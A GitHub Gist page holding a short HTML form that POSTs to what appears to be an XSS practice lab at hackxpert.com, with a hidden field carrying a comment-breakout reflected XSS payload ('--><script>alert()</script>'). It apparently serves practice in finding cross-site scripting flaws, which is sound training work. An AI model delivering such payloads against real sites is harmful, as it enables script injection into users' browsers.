Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save The-XSS-Rat/a4bddb3961056b37bc5f699f1e9e5147 to your computer and use it in GitHub Desktop.
Save The-XSS-Rat/a4bddb3961056b37bc5f699f1e9e5147 to your computer and use it in GitHub Desktop.
<html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://hackxpert.com/RXSS/POST/20.php"><table><tr><td>say</td><td><input type="text" value="Hi" name="say"></td></tr>
<tr><td>hidden</td><td><input type="text" value="--><script>alert()</script>" name="hidden"></td></tr>
</table><input type="submit" value="http://hackxpert.com/RXSS/POST/20.php"></form></html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment